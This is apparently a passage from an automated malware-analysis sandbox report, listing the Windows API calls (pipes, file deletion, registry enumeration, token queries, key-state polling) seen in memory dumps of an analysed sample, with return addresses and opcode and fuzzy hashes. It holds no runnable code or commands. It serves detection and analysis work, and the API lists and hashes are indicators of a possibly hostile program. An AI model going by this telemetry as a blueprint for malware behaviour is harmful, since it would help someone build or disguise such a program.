                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 787153527-1403004172
                                                    • Opcode ID: 2e095f86d9d7e22086bdc1e313509ec625893640f04d6a47a614fd218fc67993
                                                    • Instruction ID: b9a86f365804fcf2fd3e21955c6ce63a3c0836581408fb3794e053a8353579d7
                                                    • Opcode Fuzzy Hash: 2e095f86d9d7e22086bdc1e313509ec625893640f04d6a47a614fd218fc67993
                                                    • Instruction Fuzzy Hash: D321E6729051087EEB15ABA0DC86DFF776CDF063A0B10412EF525961E0DB391D8A9B24
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,0043FC6D,?), ref: 0042712B
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,0043FC6D,?), ref: 0042715D
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,0043FC6D,?), ref: 0042716E
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004271A8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 38bd4b805c94129d4286abd8b365bff79b6c8dadd178c7046af22eb2aaeb55cf
                                                    • Instruction ID: 7fc0a4bd6c800d2d8e4412fb5f8e5f4269dc4ca7ce87cb356246c50a7b52bf90
                                                    • Opcode Fuzzy Hash: 38bd4b805c94129d4286abd8b365bff79b6c8dadd178c7046af22eb2aaeb55cf
                                                    • Instruction Fuzzy Hash: E021B275604225ABDB209F64AC04EBBB7A8EF52370F600A1BF9E0D33D0D6759851C768
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • SendMessageW.USER32(00000000,00000467,?,?), ref: 004466D0
                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 004466D7
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004466EC
                                                    • DestroyWindow.USER32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 004466F4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 5c8267d35c67f0540632afe0c2645cdc47671d18398fb4771355ace54f27edd9
                                                    • Instruction ID: d1edd7b09570d5e5af68a43c955abf04087c48826590343cc372349c1e124158
                                                    • Opcode Fuzzy Hash: 5c8267d35c67f0540632afe0c2645cdc47671d18398fb4771355ace54f27edd9
                                                    • Instruction Fuzzy Hash: 6A215E71100205BAFF104FA4EC81EBB77ADEB57368F13462AF95192290C7798C51976A
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C,00000001,?,?,0043FC38,?), ref: 0042705E
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000001,00000001,?,?,0043FC38,?), ref: 00427091
                                                    • GetStdHandle.KERNEL32(0000000C,00000001,?,?,0043FC38,?), ref: 004270A3
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000001,?,?,0043FC38,?), ref: 004270DD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 0ea95498cb583a7feb5b65d0721474fbcdfacbc9aeaa3bc7156a6e748ef6537e
                                                    • Instruction ID: b43bfcb7048fc6340af26e86f30804202b1f76dce1b35cec106d2dcee32ee2bb
                                                    • Opcode Fuzzy Hash: 0ea95498cb583a7feb5b65d0721474fbcdfacbc9aeaa3bc7156a6e748ef6537e
                                                    • Instruction Fuzzy Hash: 9721A375704225ABDF209F74EC05A9A7BA4FF45320F604A6BF9A0D72D0D7759808CB68
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00422048
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: d56e0489f536ae389679f800a845dcbc2de7b8e0ca01d308f255f85d66bd652a
                                                    • Instruction ID: a42b843a36c78b67e392e8006f894d8c9d62d78a3010b829ad793ef7ed8578b4
                                                    • Opcode Fuzzy Hash: d56e0489f536ae389679f800a845dcbc2de7b8e0ca01d308f255f85d66bd652a
                                                    • Instruction Fuzzy Hash: 6211A130900129DFCF00EFA4D9409EEB3B0FF15300B90856AD955AB391DB726D0ACB58
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,-00002474,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004296DC
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 00429785
                                                    • CopyFileW.KERNEL32(?,?,?,-00002474,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042979B
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004297AC
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004297BE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: File$Delete$Copy
                                                    • String ID:
                                                    • API String ID: 3226157194-0
                                                    • Opcode ID: 5785bd7b1e1a16118f2deef0d754ccc9937ed187c33368b3dd4a92f26792bc5d
                                                    • Instruction ID: 5008f6476ff7410cd5775c76564029a3cbd4e4d2e646f799cb65bfa4162b22bf
                                                    • Opcode Fuzzy Hash: 5785bd7b1e1a16118f2deef0d754ccc9937ed187c33368b3dd4a92f26792bc5d
                                                    • Instruction Fuzzy Hash: C1C13AB2900129AEDF11DF95DC85EDFBBBCEF45310F5041AAF208E6141DB74AA848F69
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003FB1B6,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 003FAF92
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,?,?,?,?,003FB1B6,?,?,?,00000000,00000000,00000000,?), ref: 003FB00C
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?,00000000,00000000), ref: 003FB087
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?), ref: 003FB0A0
                                                      • Part of subcall function 003E594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,?,?,?,?,003E1013,?), ref: 003E598F
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?), ref: 003FB11D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                    • String ID:
                                                    • API String ID: 1443698708-0
                                                    • Opcode ID: 92c578bed20eed96db78bb60753fda7402f082a0e95380a17b4b6c4bb082d00e
                                                    • Instruction ID: 281593c18ee2316b470f551aa511336bc7ffff6c6c50d26349b4ad1f0f023ae3
                                                    • Opcode Fuzzy Hash: 92c578bed20eed96db78bb60753fda7402f082a0e95380a17b4b6c4bb082d00e
                                                    • Instruction Fuzzy Hash: B881C2F290021DAFDF229FA4DD919FFBBB9EF09360B15012AF658EB251D7219C048761
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043EF1B
                                                    • GetProcessIoCounters.KERNEL32 ref: 0043EF4B
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0043F07E
                                                    • CloseHandle.KERNEL32(?), ref: 0043F0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 012502cd9df5f58cb970f1728b6884d718f8727d256c442d9c7993f52da72c3e
                                                    • Instruction ID: 288fadc6fe26cffbd7556261d47382ace6935d6ae7154cf6c68043eab7437f6f
                                                    • Opcode Fuzzy Hash: 012502cd9df5f58cb970f1728b6884d718f8727d256c442d9c7993f52da72c3e
                                                    • Instruction Fuzzy Hash: 8081A3756007009FD721DF29C886F6BB7E5AF48720F05882EF999DB392DBB4AD048B45
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003ED84C
                                                    • GetStartupInfoW.KERNEL32(?,0047BF10,00000064,003E7F27,0047BD38,00000014), ref: 003ED8A5
                                                    • GetFileType.KERNEL32 ref: 003ED939
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CallCriticalEnterFileFilterFunc@8InfoSectionStartupType
                                                    • String ID:
                                                    • API String ID: 2341069899-0
                                                    • Opcode ID: 2f0ff5b43d3d8980693f2a913dca72c143e1705ec01da794fd3e1167e82eb4e2
                                                    • Instruction ID: d50e4657f7cd0eeadbe3964beaffad574c70930f411f698e453f512b25ea986f
                                                    • Opcode Fuzzy Hash: 2f0ff5b43d3d8980693f2a913dca72c143e1705ec01da794fd3e1167e82eb4e2
                                                    • Instruction Fuzzy Hash: 209116B1D042A58EDB11CF6ADC415AEBBF4EF06324B24477EE4A6AB3D1D7349902CB14
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0041F3F7
                                                    • VariantClear.OLEAUT32(00000013), ref: 0041F469
                                                    • VariantClear.OLEAUT32(00000000), ref: 0041F4C4
                                                    • VariantClear.OLEAUT32(?), ref: 0041F53B
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0041F569
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType
                                                    • String ID:
                                                    • API String ID: 4136290138-0
                                                    • Opcode ID: 081419cc11abeda3cf16fd39e6fb640e6983db758dc4d1fad379cb7a0bab5f4d
                                                    • Instruction ID: dc71ded45f6c0ef68155faf323d36f6cd4918f10be37c1909971fde169ccbfbf
                                                    • Opcode Fuzzy Hash: 081419cc11abeda3cf16fd39e6fb640e6983db758dc4d1fad379cb7a0bab5f4d
                                                    • Instruction Fuzzy Hash: 4F5188B5A00209EFCB10CF58D880EAAB7F9FF48354B15856AE949DB301D734E946CFA4
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DC3B
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0043DCBE
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0043DCDA
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0043DD1B
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DD35
                                                      • Part of subcall function 003C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00427B20,00000000,80020004,00000000), ref: 003C5B8C
                                                      • Part of subcall function 003C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,80020004,00000000,00000000,00000001,?,00427B20,00000000,80020004,00000000,?,00000001), ref: 003C5BB0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                    • String ID:
                                                    • API String ID: 666041331-0
                                                    • Opcode ID: 67f2576fbd71807026830536dace74d04a663ef2a8366ab5b08dadb6b61cc960
                                                    • Instruction ID: 583cc8f11f4316abf625c9a52aaaac6015c16e88fbafdd4d51c049e9c6a878de
                                                    • Opcode Fuzzy Hash: 67f2576fbd71807026830536dace74d04a663ef2a8366ab5b08dadb6b61cc960
                                                    • Instruction Fuzzy Hash: FF513975A00205EFDB01EFA8D884DAEB7B8FF19320B15C06AE819AB311DB35AD45CB55
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440388
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004403C7
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0044040E
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0044043A
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440447
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3740051246-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00422792
                                                    • IsMenu.USER32 ref: 004227B2
                                                    • CreatePopupMenu.USER32(00486890,?,774233D0), ref: 004227E6
                                                    • GetMenuItemCount.USER32 ref: 00422844
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00422875
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID:
                                                    • API String ID: 93392585-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0042E88A
                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0042E8B3
                                                    • WritePrivateProfileSectionW.KERNEL32 ref: 0042E8F2
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0042E917
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0042E91F
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 003F4948
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0043C3D7,?), ref: 003F4956
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0043C3D7), ref: 003F49A9
                                                    • _strlen.LIBCMT ref: 003F49CE
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?), ref: 003F49E4
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_strlen
                                                    • String ID:
                                                    • API String ID: 1602738612-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                    • ScreenToClient.USER32 ref: 003C2374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowRect.USER32 ref: 00418F12
                                                    • PostMessageW.USER32(?,00000201,?,00000000), ref: 00418FBC
                                                    • Sleep.KERNEL32(00000000), ref: 00418FC4
                                                    • PostMessageW.USER32(?,00000202,00000000,00000000), ref: 00418FD2
                                                    • Sleep.KERNEL32(00000000), ref: 00418FDA
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044B44C
                                                    • SetWindowLongW.USER32 ref: 0044B471
                                                    • SetWindowLongW.USER32 ref: 0044B489
                                                    • GetSystemMetrics.USER32 ref: 0044B4B2
                                                    • SetWindowPos.USER32(00000000,00C00000,00C00000,00C00000,00C00000,00C00000,00000047,?,?,?,?,?,?,?,00431184,00000000), ref: 0044B4D0
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                    • SelectObject.GDI32(?,00000000), ref: 003C135C
                                                    • BeginPath.GDI32(?), ref: 003C1373
                                                    • SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041766F
                                                    • ProgIDFromCLSID.OLE32(00000000,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041768A
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 00417698
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176A8
                                                    • CLSIDFromString.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176B4
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                     Uniqueness Score: -1.00%

                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425502
                                                    • QueryPerformanceFrequency.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425510
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425518
                                                    • QueryPerformanceCounter.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425522
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 7ef0b39070b9e243d3900aee7dfeb8cf3c369b1f9314846133fe45eb99129d70
                                                    • Instruction ID: 9b4acbc99dbab651165b8ff76088596d94a3c9c3b7ae02d66a3dc391b0ea2112
                                                    • Opcode Fuzzy Hash: 7ef0b39070b9e243d3900aee7dfeb8cf3c369b1f9314846133fe45eb99129d70
                                                    • Instruction Fuzzy Hash: C9015E36E01929EBCF00ABE5FC489EEBB78FB0A751F400066E405B2144DB355594C76A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00418D7D,00000000,?,?,00000000,00000000), ref: 00418608
                                                    • GetLastError.KERNEL32(?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418612
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418621
                                                    • HeapAlloc.KERNEL32(00000000,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418628
                                                    • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977), ref: 0041863E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: b5a6a173cb6f8acf6f6ef1ca064a9d14bec809ed4d52a7f709852e207f74aa93
                                                    • Instruction ID: aaf5e1930002ad747d40cb98f4cd045ccaf57341e2df90ae360d8f8400460448
                                                    • Opcode Fuzzy Hash: b5a6a173cb6f8acf6f6ef1ca064a9d14bec809ed4d52a7f709852e207f74aa93
                                                    • Instruction Fuzzy Hash: 65F04F75241204BFEB200FA5EC8DEAB3FACEF86755B40453AF445D6150CA255C45CA78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418669
                                                    • GetLastError.KERNEL32(?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418673
